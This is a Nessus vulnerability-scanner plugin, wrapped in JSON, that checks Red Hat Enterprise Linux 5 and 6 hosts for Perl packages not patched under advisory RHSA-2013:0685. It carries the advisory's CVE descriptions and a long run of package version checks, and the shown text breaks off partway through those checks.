"p-cpe:/a:redhat:enterprise_linux:perl-Module-Load-Conditional", "cpe:/o:redhat:enterprise_linux:6", "p-cpe:/a:redhat:enterprise_linux:perl-File-Fetch", "p-cpe:/a:redhat:enterprise_linux:perl-CPAN", "p-cpe:/a:redhat:enterprise_linux:perl-debuginfo", "p-cpe:/a:redhat:enterprise_linux:perl-IO-Compress-Base"], "id": "REDHAT-RHSA-2013-0685.NASL", "href": "https://www.tenable.com/plugins/nessus/65698", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2013:0685. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(65698);\n script_version(\"1.33\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/09/24\");\n\n script_cve_id(\"CVE-2012-5195\", \"CVE-2012-5526\", \"CVE-2012-6329\", \"CVE-2013-1667\");\n script_bugtraq_id(56287, 56562, 56950, 58311);\n script_xref(name:\"RHSA\", value:\"2013:0685\");\n\n script_name(english:\"RHEL 5 / 6 : perl (RHSA-2013:0685)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated perl packages that fix multiple security issues now available\nfor Red Hat Enterprise Linux 5 and 6.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nPerl is a high-level programming language commonly used for system\nadministration utilities and web programming.\n\nA heap overflow flaw was found in Perl. If a Perl application allowed\nuser input to control the count argument of the string repeat\noperator, an attacker could cause the application to crash or,\npotentially, execute arbitrary code with the privileges of the user\nrunning the application. (CVE-2012-5195)\n\nA denial of service flaw was found in the way Perl's rehashing code\nimplementation, responsible for recalculation of hash keys and\nredistribution of hash content, handled certain input. If an attacker\nsupplied specially crafted input to be used as hash keys by a Perl\napplication, it could cause excessive memory consumption.\n(CVE-2013-1667)\n\nIt was found that the Perl CGI module, used to handle Common Gateway\nInterface requests and responses, incorrectly sanitized the values for\nSet-Cookie and P3P headers. If a Perl application using the CGI module\nreused cookies values and accepted untrusted input from web browsers,\na remote attacker could use this flaw to alter member items of the\ncookie or add new items. (CVE-2012-5526)\n\nIt was found that the Perl Locale::Maketext module, used to localize\nPerl applications, did not properly handle backslashes or\nfully-qualified method names. An attacker could possibly use this flaw\nto execute arbitrary Perl code with the privileges of a Perl\napplication that uses untrusted Locale::Maketext templates.\n(CVE-2012-6329)\n\nRed Hat would like to thank the Perl project for reporting\nCVE-2012-5195 and CVE-2013-1667. Upstream acknowledges Tim Brown as\nthe original reporter of CVE-2012-5195 and Yves Orton as the original\nreporter of CVE-2013-1667.\n\nAll Perl users should upgrade to these updated packages, which contain\nbackported patches to correct these issues. All running Perl programs\nmust be restarted for this update to take effect.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2013:0685\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2012-6329\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2013-1667\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2012-5526\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2012-5195\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Foswiki 1.1.5 RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'TWiki MAKETEXT Remote Command Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:perl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:perl-Archive-Extract\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:perl-Archive-Tar\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:perl-CGI\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:perl-CPAN\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:perl-CPANPLUS\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:perl-Compress-Raw-Bzip2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:perl-Compress-Raw-Zlib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:perl-Compress-Zlib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:perl-Digest-SHA\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:perl-ExtUtils-CBuilder\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:perl-ExtUtils-Embed\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:perl-ExtUtils-MakeMaker\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:perl-ExtUtils-ParseXS\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:perl-File-Fetch\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:perl-IO-Compress-Base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:perl-IO-Compress-Bzip2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:perl-IO-Compress-Zlib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:perl-IO-Zlib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:perl-IPC-Cmd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:perl-Locale-Maketext-Simple\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:perl-Log-Message\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:perl-Log-Message-Simple\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:perl-Module-Build\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:perl-Module-CoreList\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:perl-Module-Load\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:perl-Module-Load-Conditional\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:perl-Module-Loaded\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:perl-Module-Pluggable\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:perl-Object-Accessor\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:perl-Package-Constants\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:perl-Params-Check\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:perl-Parse-CPAN-Meta\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:perl-Pod-Escapes\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:perl-Pod-Simple\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:perl-Term-UI\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:perl-Test-Harness\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:perl-Test-Simple\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:perl-Time-HiRes\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:perl-Time-Piece\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:perl-core\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:perl-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:perl-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:perl-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:perl-parent\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:perl-suidperl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:perl-version\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5.9\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.4\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/11/21\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/03/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/03/27\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(5|6)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 5.x / 6.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2013:0685\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"perl-5.8.8-40.el5_9\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"perl-5.8.8-40.el5_9\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"perl-5.8.8-40.el5_9\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"perl-debuginfo-5.8.8-40.el5_9\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"perl-debuginfo-5.8.8-40.el5_9\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"perl-debuginfo-5.8.8-40.el5_9\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"perl-suidperl-5.8.8-40.el5_9\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"perl-suidperl-5.8.8-40.el5_9\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"perl-suidperl-5.8.8-40.el5_9\")) flag++;\n\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"perl-5.10.1-130.el6_4\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"perl-5.10.1-130.el6_4\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"perl-5.10.1-130.el6_4\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"perl-Archive-Extract-0.38-130.el6_4\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"perl-Archive-Extract-0.38-130.el6_4\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"perl-Archive-Extract-0.38-130.el6_4\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"perl-Archive-Tar-1.58-130.el6_4\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"perl-Archive-Tar-1.58-130.el6_4\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"perl-Archive-Tar-1.58-130.el6_4\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"perl-CGI-3.51-130.el6_4\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"perl-CGI-3.51-130.el6_4\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"perl-CGI-3.51-130.el6_4\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"perl-CPAN-1.9402-130.el6_4\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"perl-CPAN-1.9402-130.el6_4\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"perl-CPAN-1.9402-130.el6_4\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"perl-CPANPLUS-0.88-130.el6_4\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"perl-CPANPLUS-0.88-130.el6_4\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"perl-CPANPLUS-0.88-130.el6_4\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"perl-Compress-Raw-Bzip2-2.020-130.el6_4\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"perl-Compress-Raw-Bzip2-2.020-130.el6_4\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"perl-Compress-Raw-Bzip2-2.020-130.el6_4\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"perl-Compress-Raw-Zlib-2.020-130.el6_4\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"perl-Compress-Raw-Zlib-2.020-130.el6_4\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"perl-Compress-Raw-Zlib-2.020-130.el6_4\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"perl-Compress-Zlib-2.020-130.el6_4\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"perl-Compress-Zlib-2.020-130.el6_4\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"perl-Compress-Zlib-2.020-130.el6_4\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"perl-Digest-SHA-5.47-130.el6_4\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"perl-Digest-SHA-5.47-130.el6_4\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"perl-Digest-SHA-5.47-130.el6_4\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"perl-ExtUtils-CBuilder-0.27-130.el6_4\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"perl-ExtUtils-CBuilder-0.27-130.el6_4\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"perl-ExtUtils-CBuilder-0.27-130.el6_4\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"perl-ExtUtils-Embed-1.28-130.el6_4\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"perl-ExtUtils-Embed-1.28-130.el6_4\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"perl-ExtUtils-Embed-1.28-130.el6_4\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"perl-ExtUtils-MakeMaker-6.55-130.el6_4\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"perl-ExtUtils-MakeMaker-6.55-130.el6_4\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"perl-ExtUtils-MakeMaker-6.55-130.el6_4\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"perl-ExtUtils-ParseXS-2.2003.0-130.el6_4\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"perl-ExtUtils-ParseXS-2.2003.0-130.el6_4\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"perl-ExtUtils-ParseXS-2.2003.0-130.el6_4\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"perl-File-Fetch-0.26-130.el6_4\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"perl-File-Fetch-0.26-130.el6_4\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"perl-File-Fetch-0.26-130.el6_4\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"perl-IO-Compress-Base-2.020-130.el6_4\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"perl-IO-Compress-Base-2.020-130.el6_4\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"perl-IO-Compress-Base-2.020-130.el6_4\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"perl-IO-Compress-Bzip2-2.020-130.el6_4\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"perl-IO-Compress-Bzip2-2.020-130.el6_4\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"perl-IO-Compress-Bzip2-2.020-130.el6_4\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"perl-IO-Compress-Zlib-2.020-130.el6_4\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"perl-IO-Compress-Zlib-2.020-130.el6_4\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"perl-IO-Compress-Zlib-2.020-130.el6_4\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"perl-IO-Zlib-1.09-130.el6_4\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"perl-IO-Zlib-1.09-130.el6_4\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"perl-IO-Zlib-1.09-130.el6_4\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"perl-IPC-Cmd-0.56-130.el6_4\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"perl-IPC-Cmd-0.56-130.el6_4\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"perl-IPC-Cmd-0.56-130.el6_4\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"perl-Locale-Maketext-Simple-0.18-130.el6_4\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"perl-Locale-Maketext-Simple-0.18-130.el6_4\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"perl-Locale-Maketext-Simple-0.18-130.el6_4\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"perl-Log-Message-0.02-130.el6_4\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"perl-Log-Message-0.02-130.el6_4\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"perl-Log-Message-0.02-130.el6_4\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"perl-Log-Message-Simple-0.04-130.el6_4\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"perl-Log-Message-Simple-0.04-130.el6_4\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"perl-Log-Message-Simple-0.04-130.el6_4\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"perl-Module-Build-0.3500-130.el6_4\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"perl-Module-Build-0.3500-130.el6_4\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"perl-Module-Build-0.3500-130.el6_4\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"perl-Module-CoreList-2.18-130.el6_4\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"perl-Module-CoreList-2.18-130.el6_4\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"perl-Module-CoreList-2.18-130.el6_4\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"perl-Module-Load-0.16-130.el6_4\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"perl-Module-Load-0.16-130.el6_4\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"perl-Module-Load-0.16-130.el6_4\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"perl-Module-Load-Conditional-0.30-130.el6_4\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"perl-Module-Load-Conditional-0.30-130.el6_4\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"perl-Module-Load-Conditional-0.30-130.el6_4\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"perl-Module-Loaded-0.02-130.el6_4\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"perl-Module-Loaded-0.02-130.el6_4\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"perl-Module-Loaded-0.02-130.el6_4\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"perl-Module-Pluggable-3.90-130.el6_4\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"perl-Module-Pluggable-3.90-130.el6_4\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"perl-Module-Pluggable-3.90-130.el6_4\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"perl-Object-Accessor-0.34-130.el6_4\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"perl-Object-Accessor-0.34-130.el6_4\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"perl-Object-Accessor-0.34-130.el6_4\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"perl-Package-Constants-0.02-130.el6_4\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"perl-Package-Constants-0.02-130.el6_4\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"perl-Package-Constants-0.02-130.el6_4\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"perl-Params-Check-0.26-130.el6_4\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"perl-Params-Check-0.26-130.el6_4\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"perl-Params-Check-0.26-130.el6_4\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"perl-Parse-CPAN-Meta-1.40-130.el6_4\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"perl-Parse-CPAN-Meta-1.40-130.el6_4\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"perl-Parse-CPAN-Meta-1.40-130.el6_4\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"perl-Pod-Escapes-1.04-130.el6_4\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"perl-Pod-Escapes-1.04-130.el6_4\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"perl-Pod-Escapes-1.04-130.el6_4\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"perl-Pod-Simple-3.13-130.el6_4\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"perl-Pod-Simple-3.13-130.el6_4\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"perl-Pod-Simple-3.13-130.el6_4\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"perl-Term-UI-0.20-130.el6_4\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"perl-Term-UI-0.20-130.el6_4\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"perl-Term-UI-0.20-130.el6_4\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"perl-Test-Harness-3.17-130.el6_4\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"perl-Test-Harness-3.17-130.el6_4\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"perl-Test-Harness-3.17-130.el6_4\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"perl-Test-Simple-0.92-130.el6_4\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"perl-Test-Simple-0.92-130.el6_4\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"perl-Test-Simple-0.92-130.el6_4\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"perl-Time-HiRes-1.9721-130.el6_4\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"perl-Time-HiRes-1.9721-130.el6_4\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"perl-Time-HiRes-1.9721-130.el6_4\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", 